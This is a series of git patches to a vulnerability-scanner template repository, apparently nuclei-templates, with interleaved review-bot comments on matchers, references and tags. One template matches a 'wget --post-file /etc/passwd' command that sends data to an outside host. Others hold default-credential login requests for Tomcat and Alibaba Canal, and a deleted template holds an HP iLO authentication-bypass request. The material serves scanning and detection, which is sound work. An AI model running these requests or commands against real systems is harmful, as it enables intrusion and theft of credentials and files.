@@ -44,7 +44,7 @@ requests: - j5Brn9 - tomcat - attack: clusterbomb # Available options: sniper, pitchfork and clusterbomb + attack: pitchfork # Available options: sniper, pitchfork and clusterbomb raw: # Request with simple param and header manipulation with DSL functions From de7c175c56e87f9b021a468cfa57accd6d178576 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 4 Mar 2021 16:37:12 +0530 Subject: [PATCH 217/370] removing duplicates --- exposures/configs/phpinfo.yaml | 2 -- 1 file changed, 2 deletions(-) diff --git a/exposures/configs/phpinfo.yaml b/exposures/configs/phpinfo.yaml index 8675a8fe21..e49e256cce 100644 --- a/exposures/configs/phpinfo.yaml +++ b/exposures/configs/phpinfo.yaml @@ -21,9 +21,7 @@ requests: - "{{BaseURL}}/time.php" - "{{BaseURL}}/index.php" - "{{BaseURL}}/temp.php" - - "{{BaseURL}}/PHPInfo.php" - "{{BaseURL}}/old_phpinfo.php" - - "{{BaseURL}}/index.php" - "{{BaseURL}}/infos.php" - "{{BaseURL}}/linusadmin-phpinfo.php" - "{{BaseURL}}/php-info.php" From 0089e398745eddbbee49336d5dd60e6c6906997f Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 4 Mar 2021 16:42:05 +0530 Subject: [PATCH 218/370] Improving matchers --- exposures/configs/exposed-bzr.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/exposures/configs/exposed-bzr.yaml b/exposures/configs/exposed-bzr.yaml index a931b7c200..743b51acdb 100644 --- a/exposures/configs/exposed-bzr.yaml +++ b/exposures/configs/exposed-bzr.yaml @@ -10,12 +10,13 @@ requests: path: - "{{BaseURL}}/.bzr/branch/branch.conf" + matchers-condition: and matchers: - type: word words: - "parent_location" - "push_location" - condition: or + condition: and - type: status status: From 383d9a160ca54b6b4d51faedbd3bf6ce3d1c21a7 Mon Sep 17 00:00:00 2001 
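Review bot: Switching `attack: clusterbomb` to `attack: pitchfork` in default-logins/apache/tomcat-manager-default.yaml changes the semantics of the payload lists that start above this hunk: pitchfork walks the username and password lists in lockstep, so only index-aligned pairs are tried and both lists must be the same length, whereas clusterbomb tried every combination. The hunk shows only the tail of the password list (`j5Brn9`, `tomcat`), so alignment with the username list cannot be confirmed here; please verify it and record the intent, e.g. `attack: pitchfork # lists are paired by index; keep usernames and passwords aligned and equal in length`. The retained `# Available options: ...` comment does not say why pitchfork was chosen (fewer requests, known default pairs), which is what a future editor needs.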
From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 4 Mar 2021 16:44:24 +0530 Subject: [PATCH 219/370] Adding reference --- exposures/configs/exposed-bzr.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposures/configs/exposed-bzr.yaml b/exposures/configs/exposed-bzr.yaml index 743b51acdb..90396575a7 100644 --- a/exposures/configs/exposed-bzr.yaml +++ b/exposures/configs/exposed-bzr.yaml @@ -4,6 +4,7 @@ info: name: Exposed BZR Directory author: daffainfo severity: low + reference: http://doc.bazaar.canonical.com/beta/en/user-reference/configuration-help.html requests: - method: GET From b1bdd78aa1aee8f43165d92a9d1d32011f0062b9 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 4 Mar 2021 11:17:40 +0000 Subject: [PATCH 220/370] Auto Update README [Thu Mar 4 11:17:40 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 5c04c3b8f9..88f26f1cc3 100644 --- a/README.md +++ b/README.md @@ -38,12 +38,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | | cves | 220 | vulnerabilities | 105 | exposed-panels | 94 | -| exposures | 56 | technologies | 48 | misconfiguration | 50 | +| exposures | 57 | technologies | 48 | misconfiguration | 50 | | workflows | 23 | miscellaneous | 16 | default-logins | 16 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**68 directories, 663 files**. +**68 directories, 664 files**. From 82d6f9d370d121397c778e0bc50c9310da2a212f Mon Sep 17 00:00:00 2001 
From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 4 Mar 2021 16:50:18 +0530 Subject: [PATCH 221/370] improved matcher --- exposures/configs/exposed-bitkeeper.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/exposures/configs/exposed-bitkeeper.yaml b/exposures/configs/exposed-bitkeeper.yaml index 03d1f53634..2ad1fcc9bb 100644 --- a/exposures/configs/exposed-bitkeeper.yaml +++ b/exposures/configs/exposed-bitkeeper.yaml @@ -4,12 +4,14 @@ info: name: Exposed BitKeeper Directory author: daffainfo severity: low + reference: https://www.bitkeeper.org/man/config-etc.html requests: - method: GET path: - "{{BaseURL}}/BitKeeper/etc/config" + matchers-condition: and matchers: - type: word words: From f21e326d6252243b56f04306661f0049dc42ecce Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 4 Mar 2021 11:21:15 +0000 Subject: [PATCH 222/370] Auto Update README [Thu Mar 4 11:21:15 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 88f26f1cc3..8740e8b79d 100644 --- a/README.md +++ b/README.md @@ -38,12 +38,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | | cves | 220 | vulnerabilities | 105 | exposed-panels | 94 | -| exposures | 57 | technologies | 48 | misconfiguration | 50 | +| exposures | 58 | technologies | 48 | misconfiguration | 50 | | workflows | 23 | miscellaneous | 16 | default-logins | 16 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**68 directories, 664 files**. +**68 directories, 665 files**. From c3ead4494ee18feee65a1677cd787b0383330d78 Mon Sep 17 00:00:00 2001 
From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 4 Mar 2021 16:54:34 +0530 Subject: [PATCH 223/370] Update exposed-darcs.yaml --- exposures/configs/exposed-darcs.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/exposures/configs/exposed-darcs.yaml b/exposures/configs/exposed-darcs.yaml index 623c59a8f7..49cd676300 100644 --- a/exposures/configs/exposed-darcs.yaml +++ b/exposures/configs/exposed-darcs.yaml @@ -1,15 +1,17 @@ id: exposed-darcs info: - name: Exposed Darcs Directory + name: Exposed Darcs Config author: daffainfo severity: low + reference: http://darcs.net/Using/Configuration#sources requests: - method: GET path: - "{{BaseURL}}/_darcs/prefs/binaries" + matchers-condition: and matchers: - type: word words: From 5bcf45bbf66af0b3340d1dd9f0e26be38756cee1 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 4 Mar 2021 11:25:26 +0000 Subject: [PATCH 224/370] Auto Update README [Thu Mar 4 11:25:26 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 8740e8b79d..7714c90ada 100644 --- a/README.md +++ b/README.md @@ -38,12 +38,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | | cves | 220 | vulnerabilities | 105 | exposed-panels | 94 | -| exposures | 58 | technologies | 48 | misconfiguration | 50 | +| exposures | 59 | technologies | 48 | misconfiguration | 50 | | workflows | 23 | miscellaneous | 16 | default-logins | 16 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**68 directories, 665 files**. +**68 directories, 666 files**. From b56eda03ba825da81fa88cf4ec5f4ff684f17ceb Mon Sep 17 00:00:00 2001 
From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 4 Mar 2021 17:06:46 +0530 Subject: [PATCH 225/370] wip fix --- cves/{ => 2017}/CVE-2017-12542.yaml | 7 +++++-- technologies/ilo-detect.yaml | 8 ++++++++ 2 files changed, 13 insertions(+), 2 deletions(-) rename cves/{ => 2017}/CVE-2017-12542.yaml (88%) diff --git a/cves/CVE-2017-12542.yaml b/cves/2017/CVE-2017-12542.yaml similarity index 88% rename from cves/CVE-2017-12542.yaml rename to cves/2017/CVE-2017-12542.yaml index b4879edd9a..63cf3ce77a 100644 --- a/cves/CVE-2017-12542.yaml +++ b/cves/2017/CVE-2017-12542.yaml @@ -1,10 +1,12 @@ -id: CVE-2017-12637 +id: CVE-2017-12542 info: name: Authentication Bypass in HPE Integrated Lights-out 4 (iLO 4) version prior to 2.53 author: apt-mirror severity: high description: A authentication bypass and execution of code vulnerability in HPE Integrated Lights-out 4 (iLO 4) version prior to 2.53 was found. + reference: https://www.synacktiv.com/en/publications/rce-vulnerability-in-hp-ilo.html tags: cve,cve2017,hp,ilo,traversal + # References: # - [1] https://www.cvedetails.com/cve/CVE-2017-12542/ # - [2] https://nvd.nist.gov/vuln/detail/CVE-2017-12542 @@ -15,7 +17,7 @@ requests: GET /rest/v1/AccountService/Accounts HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA Upgrade-Insecure-Requests: 1 @@ -24,6 +26,7 @@ requests: words: - "Items" part: body + - method: GET path: - "{{BaseURL}}/xmldata?item=all" diff --git a/technologies/ilo-detect.yaml b/technologies/ilo-detect.yaml index f55b451afa..6743892663 100644 --- a/technologies/ilo-detect.yaml +++ b/technologies/ilo-detect.yaml 
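Review bot: The first hunk of cves/2017/CVE-2017-12542.yaml adds a `reference:` key but keeps the `# References:` comment with three further URLs directly under `tags:`; nuclei only reads `reference:`, so the template now has one machine-readable source and a partial duplicate in a comment. Fold all four URLs into `reference:` and delete the comment block. While editing `info`, `A authentication bypass` should read `An authentication bypass`, and `traversal` in `tags: cve,cve2017,hp,ilo,traversal` does not describe the authentication bypass the description names. The id correction to `CVE-2017-12542` is right and aligns the template with the file name it is renamed to.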
@@ -1,13 +1,21 @@ id: ilo-detect + info: name: HP iLO author: milo2012 severity: info description: Version of HP iLO + requests: - method: GET path: - "{{BaseURL}}/xmldata?item=all" + + matchers: + - type: status + status: + - 200 + extractors: - type: regex part: body From d66564f69908e76f52669547ce17d59fb5d53405 Mon Sep 17 00:00:00 2001 From: Douglas Santos Date: Thu, 4 Mar 2021 13:34:40 +0000 Subject: [PATCH 226/370] hmc --- exposed-panels/hmc-hybris-panel.yaml | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) create mode 100644 exposed-panels/hmc-hybris-panel.yaml diff --git a/exposed-panels/hmc-hybris-panel.yaml b/exposed-panels/hmc-hybris-panel.yaml new file mode 100644 index 0000000000..eb60e52f28 --- /dev/null +++ b/exposed-panels/hmc-hybris-panel.yaml @@ -0,0 +1,17 @@ +id: hmc-hybris-panel + +info: + name: SAP Hybris Management Console + author: dogasantos + severity: info + +requests: + - method: GET + path: + - "{{BaseURL}}/hmc/hybris" + matchers: + - type: word + words: + - "hybris Management Console" + part: body + From eb02ca13ecf4754394382998f6ce298f01caabfe Mon Sep 17 00:00:00 2001 From: Douglas Santos Date: Thu, 4 Mar 2021 13:42:43 +0000 Subject: [PATCH 227/370] new path --- exposed-panels/hmc-hybris-panel.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposed-panels/hmc-hybris-panel.yaml b/exposed-panels/hmc-hybris-panel.yaml index eb60e52f28..01440c9894 100644 --- a/exposed-panels/hmc-hybris-panel.yaml +++ b/exposed-panels/hmc-hybris-panel.yaml @@ -9,6 +9,7 @@ requests: - method: GET path: - "{{BaseURL}}/hmc/hybris" + - "{{BaseURL}}/hybris/hmc/hybris" matchers: - type: word words: From 6aac34fa0d1e30c6816a6d337ad1f2e9d29309cd Mon Sep 17 00:00:00 2001 From: Douglas Santos Date: Thu, 4 Mar 2021 13:47:55 +0000 Subject: [PATCH 228/370] trailing-spaces/empty-lines fix --- exposed-panels/hmc-hybris-panel.yaml | 3 --- 1 file changed, 3 deletions(-) 
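Review bot: The only matcher this hunk adds to `ilo-detect` is `status: 200` on `/xmldata?item=all`, so any host that answers 200 for that path, including catch-all servers that return 200 for unknown URLs, will be fingerprinted as HP iLO and the extractor (cut off below the hunk) then runs on arbitrary HTML. A detection template should key on something iLO-specific in the response, for example a `- type: word` / `part: header` check for `text/xml` combined with `matchers-condition: and`, rather than on the status code alone. The `extractors:` section continues outside the hunk.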
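Review bot: `info` in the new `hmc-hybris-panel.yaml` has no `tags:` entry, so the template cannot be selected or excluded with tag filters the way other templates on this page can (`tags: alibaba,dlogin` further down); adding a line such as `tags: panel,sap,hybris` keeps it consistent with the rest of the repo. A `reference:` pointing at the product page would also help triage, since the only signal is the page title string.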
diff --git a/exposed-panels/hmc-hybris-panel.yaml b/exposed-panels/hmc-hybris-panel.yaml index 01440c9894..a5c7521742 100644 --- a/exposed-panels/hmc-hybris-panel.yaml +++ b/exposed-panels/hmc-hybris-panel.yaml @@ -1,10 +1,8 @@ id: hmc-hybris-panel - info: name: SAP Hybris Management Console author: dogasantos severity: info - requests: - method: GET path: @@ -15,4 +13,3 @@ requests: words: - "hybris Management Console" part: body - From e6adb1d7430b1ff4b06bc546d465cbf868f356e3 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 4 Mar 2021 19:20:07 +0530 Subject: [PATCH 229/370] improving matcher --- cves/2017/CVE-2017-12542.yaml | 37 ----------------------------------- technologies/ilo-detect.yaml | 14 ++++++++++++- 2 files changed, 13 insertions(+), 38 deletions(-) delete mode 100644 cves/2017/CVE-2017-12542.yaml diff --git a/cves/2017/CVE-2017-12542.yaml b/cves/2017/CVE-2017-12542.yaml deleted file mode 100644 index 63cf3ce77a..0000000000 --- a/cves/2017/CVE-2017-12542.yaml +++ /dev/null 
@@ -1,37 +0,0 @@ -id: CVE-2017-12542 -info: - name: Authentication Bypass in HPE Integrated Lights-out 4 (iLO 4) version prior to 2.53 - author: apt-mirror - severity: high - description: A authentication bypass and execution of code vulnerability in HPE Integrated Lights-out 4 (iLO 4) version prior to 2.53 was found. - reference: https://www.synacktiv.com/en/publications/rce-vulnerability-in-hp-ilo.html - tags: cve,cve2017,hp,ilo,traversal - - # References: - # - [1] https://www.cvedetails.com/cve/CVE-2017-12542/ - # - [2] https://nvd.nist.gov/vuln/detail/CVE-2017-12542 - # - [3] https://github.com/skelsec/CVE-2017-12542 -requests: - - raw: - - | - GET /rest/v1/AccountService/Accounts HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA - Upgrade-Insecure-Requests: 1 - matchers: - - type: word - words: - - "Items" - part: body - - - method: GET - path: - - "{{BaseURL}}/xmldata?item=all" - extractors: - - type: regex - part: body - regex: - - "(.*)" diff --git a/technologies/ilo-detect.yaml b/technologies/ilo-detect.yaml index 6743892663..4266260496 100644 --- a/technologies/ilo-detect.yaml +++ b/technologies/ilo-detect.yaml @@ -16,8 +16,20 @@ requests: status: - 200 + - type: word + words: + - text/xml + part: header + + - type: word + words: + - + - + condition: and + extractors: - type: regex part: body + group: 1 regex: - - "(.*)" + - "([0-9.]+)" From 8141c9f23e6a8b0ef0dcd4a0dd2bd534cdb0c5fe Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 4 Mar 2021 19:22:05 +0530 Subject: [PATCH 230/370] Update ilo-detect.yaml --- technologies/ilo-detect.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/technologies/ilo-detect.yaml b/technologies/ilo-detect.yaml index 4266260496..70f0fc1e8d 100644 --- a/technologies/ilo-detect.yaml 
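Review bot: The `ilo-detect` hunk now lists three matchers (status 200, `text/xml` in headers, the two-word body check) but does not set `matchers-condition`, which as far as I recall defaults to OR in nuclei, so the pre-existing `status: 200` matcher still fires on its own and the new checks add nothing until `matchers-condition: and` is placed above `matchers:` (the block starts above this hunk). The two `words` entries of the new body matcher render as empty here, presumably angle-bracketed XML element names dropped by the page renderer; worth confirming they survived in the committed file, since an empty word list cannot discriminate anything. The extractor regex `([0-9.]+)` is shown without its surrounding tag text for the same reason.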
+++ b/technologies/ilo-detect.yaml @@ -11,6 +11,7 @@ requests: path: - "{{BaseURL}}/xmldata?item=all" + matchers-condition: and matchers: - type: status status: From 4378593afa69667d1167fb99ca34922dff60eaf4 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 4 Mar 2021 13:52:51 +0000 Subject: [PATCH 231/370] Auto Update README [Thu Mar 4 13:52:51 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 7714c90ada..067fcd0a95 100644 --- a/README.md +++ b/README.md @@ -38,12 +38,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | | cves | 220 | vulnerabilities | 105 | exposed-panels | 94 | -| exposures | 59 | technologies | 48 | misconfiguration | 50 | +| exposures | 59 | technologies | 49 | misconfiguration | 50 | | workflows | 23 | miscellaneous | 16 | default-logins | 16 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**68 directories, 666 files**. +**68 directories, 667 files**. From 412b56a12caa12eb3f66fe86712b2aba2023d009 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 4 Mar 2021 19:24:36 +0530 Subject: [PATCH 232/370] misc updates --- exposed-panels/hmc-hybris-panel.yaml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/exposed-panels/hmc-hybris-panel.yaml b/exposed-panels/hmc-hybris-panel.yaml index a5c7521742..2fb8ab3570 100644 --- a/exposed-panels/hmc-hybris-panel.yaml +++ b/exposed-panels/hmc-hybris-panel.yaml 
@@ -1,13 +1,16 @@ id: hmc-hybris-panel + info: - name: SAP Hybris Management Console + name: SAP Hybris Management Console author: dogasantos severity: info + requests: - method: GET path: - "{{BaseURL}}/hmc/hybris" - "{{BaseURL}}/hybris/hmc/hybris" + matchers: - type: word words: From a28619afa2836ad4efb20f4f9a24b24c800cf1ae Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Thu, 4 Mar 2021 21:05:38 +0700 Subject: [PATCH 233/370] Create alibaba-canal-default-password.yaml --- .../alibaba-canal-default-password.yaml | 25 +++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 default-logins/alibaba/alibaba-canal-default-password.yaml diff --git a/default-logins/alibaba/alibaba-canal-default-password.yaml b/default-logins/alibaba/alibaba-canal-default-password.yaml new file mode 100644 index 0000000000..824a4a27a9 --- /dev/null +++ b/default-logins/alibaba/alibaba-canal-default-password.yaml @@ -0,0 +1,25 @@ +id: alibaba-canal-default-password + +info: + name: Alibaba Canal Default Password + author: pdteam + severity: high + tags: alibaba,dlogin + +requests: + - method: POST + path: + - "{{BaseURL}}/api/v1/user/login" + headers: + Content-Type: application/json + body: | + {"username":"admin","password":"123456"} + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "token" From 118dca8441d4136907a44b55379db7204661a91e Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 4 Mar 2021 19:42:08 +0530 Subject: [PATCH 234/370] Update alibaba-canal-default-password.yaml --- default-logins/alibaba/alibaba-canal-default-password.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/default-logins/alibaba/alibaba-canal-default-password.yaml b/default-logins/alibaba/alibaba-canal-default-password.yaml index 824a4a27a9..e396fa3e8d 100644 --- a/default-logins/alibaba/alibaba-canal-default-password.yaml 
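Review bot: The acceptance criterion for the new `alibaba-canal-default-password` template is the word `token` anywhere in a 200 response, which is weak for a high-severity default-login check: an API that answers a rejected login with 200 and an error mentioning a token, or a login page carrying a CSRF token, would be reported as a successful `admin`/`123456` login. Matching on the success shape of the JSON, for example `'"code":20000'` together with `'data":{"token"'` under `condition: and`, ties the hit to an actually issued session token. A `reference:` documenting where this default credential comes from would also help whoever triages the finding.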
+++ b/default-logins/alibaba/alibaba-canal-default-password.yaml @@ -22,4 +22,6 @@ requests: - 200 - type: word words: - - "token" + - 'data":{"token"' + - '"code":20000' + condition: and From 049ec6d82aa87df1617524c040309295b2c6f3f0 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 4 Mar 2021 14:13:06 +0000 Subject: [PATCH 235/370] Auto Update README [Thu Mar 4 14:13:06 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 067fcd0a95..fac6ca8f84 100644 --- a/README.md +++ b/README.md @@ -39,11 +39,11 @@ An overview of the nuclei template directory including number of templates assoc | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | | cves | 220 | vulnerabilities | 105 | exposed-panels | 94 | | exposures | 59 | technologies | 49 | misconfiguration | 50 | -| workflows | 23 | miscellaneous | 16 | default-logins | 16 | +| workflows | 23 | miscellaneous | 16 | default-logins | 17 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**68 directories, 667 files**. +**69 directories, 668 files**. From 79dc490572c5419563b85e9477e31c10f067b34b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 4 Mar 2021 14:27:55 +0000 Subject: [PATCH 236/370] Auto Update README [Thu Mar 4 14:27:55 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index fac6ca8f84..fb8fc6b02d 100644 --- a/README.md +++ b/README.md 
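Review bot: The new literal `'data":{"token"'` assumes the server emits compact JSON with no whitespace between `:` and `{`; if the API pretty-prints or reorders keys, the success case silently stops matching while nothing else flags the template as broken. A `- type: regex` matcher with `'"data"\s*:\s*\{\s*"token"'` and `'"code"\s*:\s*20000'` under `condition: and` expresses the same intent without depending on the exact serialization. This is a robustness point only; the tightened condition is an improvement over the bare `token` word.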
@@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 220 | vulnerabilities | 105 | exposed-panels | 94 | +| cves | 220 | vulnerabilities | 105 | exposed-panels | 95 | | exposures | 59 | technologies | 49 | misconfiguration | 50 | | workflows | 23 | miscellaneous | 16 | default-logins | 17 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**69 directories, 668 files**. +**69 directories, 669 files**. From da0391fd37b6fab5ad9ab5e6ce9d9b1ee13a42ea Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 4 Mar 2021 20:02:49 +0530 Subject: [PATCH 237/370] Improving matchers --- cves/2019/CVE-2019-17506.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2019/CVE-2019-17506.yaml b/cves/2019/CVE-2019-17506.yaml index 78135fb9a2..1a4818fbe1 100644 --- a/cves/2019/CVE-2019-17506.yaml +++ b/cves/2019/CVE-2019-17506.yaml @@ -27,3 +27,4 @@ requests: - "" - "DEVICE.ACCOUNT" part: body + condition: and \ No newline at end of file From 7c32ecd13e3293680c89b10735368250710d3c6b Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 4 Mar 2021 20:25:34 +0530 Subject: [PATCH 238/370] improved matcher --- cves/2021/CVE-2021-21315.yaml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/cves/2021/CVE-2021-21315.yaml b/cves/2021/CVE-2021-21315.yaml index d638b12209..e590a46279 100644 --- a/cves/2021/CVE-2021-21315.yaml +++ b/cves/2021/CVE-2021-21315.yaml @@ -23,6 +23,9 @@ requests: - type: word words: - "wget --post-file /etc/passwd burpcollaborator.net" + - name + - running + - pids part: body condition: and From 27a94bc03afcc9c821810f1ecc60d0e72ccf4dd9 Mon Sep 17 00:00:00 2001 
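Review bot: In the `CVE-2019-17506` hunk the first entry of `words` renders as an empty string (`- ""`); if it really is empty it matches every body and the newly added `condition: and` reduces to the `DEVICE.ACCOUNT` check alone, so please confirm the committed value (presumably an angle-bracketed tag lost in rendering) is non-empty. The hunk also ends with `\ No newline at end of file`; adding the trailing newline keeps yamllint and future diffs clean. The `matchers` list starts above this hunk.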
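Review bot: In the `CVE-2021-21315` hunk, matching on the literal injected string `wget --post-file /etc/passwd burpcollaborator.net` in the body shows the parameter is reflected, not that the command ran; the added `name`/`running`/`pids` words, presumably fields of the JSON the endpoint returns on success, make the reflection less likely to be an error-page echo but still do not demonstrate execution. Since the payload already names `burpcollaborator.net`, an out-of-band callback (nuclei's interactsh placeholder, if this template set supports it) would be the stronger signal; otherwise the `description` should state that the template confirms reflection of the injected argument, not execution. The request path carrying the payload is outside this hunk.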
From: GitHub Action Date: Thu, 4 Mar 2021 14:58:21 +0000 Subject: [PATCH 239/370] Auto Update README [Thu Mar 4 14:58:21 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index fb8fc6b02d..d74c75c7e9 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 220 | vulnerabilities | 105 | exposed-panels | 95 | +| cves | 221 | vulnerabilities | 105 | exposed-panels | 95 | | exposures | 59 | technologies | 49 | misconfiguration | 50 | | workflows | 23 | miscellaneous | 16 | default-logins | 17 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**69 directories, 669 files**. +**69 directories, 670 files**. From 1a652283db2c5bc6e4b65f4cf19c90d6e347a544 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 4 Mar 2021 20:28:32 +0530 Subject: [PATCH 240/370] Update CVE-2021-21315.yaml --- cves/2021/CVE-2021-21315.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-21315.yaml b/cves/2021/CVE-2021-21315.yaml index e590a46279..024445ca4a 100644 --- a/cves/2021/CVE-2021-21315.yaml +++ b/cves/2021/CVE-2021-21315.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: high reference: https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC - tags: node.js,cve,cve2021 + tags: nodejs,cve,cve2021 requests: - method: GET From b00b0bd98bb5a92a121dabe350f5847be1c60d19 Mon Sep 17 00:00:00 2001 
From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 4 Mar 2021 20:31:21 +0530 Subject: [PATCH 241/370] misc updates --- technologies/microsoft-echange-server-detect.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/technologies/microsoft-echange-server-detect.yaml b/technologies/microsoft-echange-server-detect.yaml index 05a88b55a3..d06d3b6aa9 100644 --- a/technologies/microsoft-echange-server-detect.yaml +++ b/technologies/microsoft-echange-server-detect.yaml @@ -21,9 +21,9 @@ requests: - type: regex regex: - - "(X-Owa-Version:|/owa/auth/15.2.*|/owa/auth/15.1.*|/owa/auth/15.0.*|/owa/auth/14.0.*)" + - "(X-Owa-Version:|/owa/auth/15.2.*|/owa/auth/15.1.*|/owa/auth/15.0.*|/owa/auth/14.0.*)" part: all - + extractors: - type: kval part: header From 8461498f9a54ae2ee207fabbbb579bc17d0f7071 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 4 Mar 2021 15:08:50 +0000 Subject: [PATCH 242/370] Auto Update README [Thu Mar 4 15:08:50 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index d74c75c7e9..33cccc42c2 100644 --- a/README.md +++ b/README.md @@ -38,12 +38,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | | cves | 221 | vulnerabilities | 105 | exposed-panels | 95 | -| exposures | 59 | technologies | 49 | misconfiguration | 50 | +| exposures | 59 | technologies | 50 | misconfiguration | 50 | | workflows | 23 | miscellaneous | 16 | default-logins | 17 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**69 directories, 670 files**. +**69 directories, 671 files**. From b7aba7f7acf30b8559bbc9311d2dd0af4006d644 Mon Sep 17 00:00:00 2001 
